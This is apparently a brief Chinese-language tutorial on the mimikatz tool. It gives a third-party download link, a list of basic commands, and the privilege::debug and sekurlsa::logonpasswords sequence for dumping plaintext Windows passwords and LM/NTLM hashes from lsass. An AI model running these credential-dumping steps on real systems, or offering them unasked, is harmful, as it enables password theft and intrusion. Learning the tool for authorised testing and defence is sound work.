0X00工具簡介:
mimikatz是一款windows平台下的神器,它具備很多功能,其中最亮的功能是直接從lsass.exe進程里獲取windows處於active狀態賬號以及明文密碼。mimikatz的功能不僅如此,它還可以提升進程權限,注入進程,讀取進程內存等。
0X01工具下載:
下載地址:(鏈接:https://pan.baidu.com/s/189BtUTGEGLyUfcas5pMhHg 提取碼:zwj9)
下載解壓后雙擊.exe即可運行。
0X02基礎命令:
cls 清屏 exit 退出 version 查看版本 help 查看幫助 system::user 查看當前登錄的系統用戶 system::computer 查看計算機名稱 process::list 列出進程 privilege::debug 提升權限 sekurlsa::logonpasswords 獲取登錄用戶信息以及明文密碼
0X03使用效果:
首先提權
privilege::debug
獲取本機用戶名、密碼、sid、LM hash、NTML hash等。
sekurlsa::logonpasswords
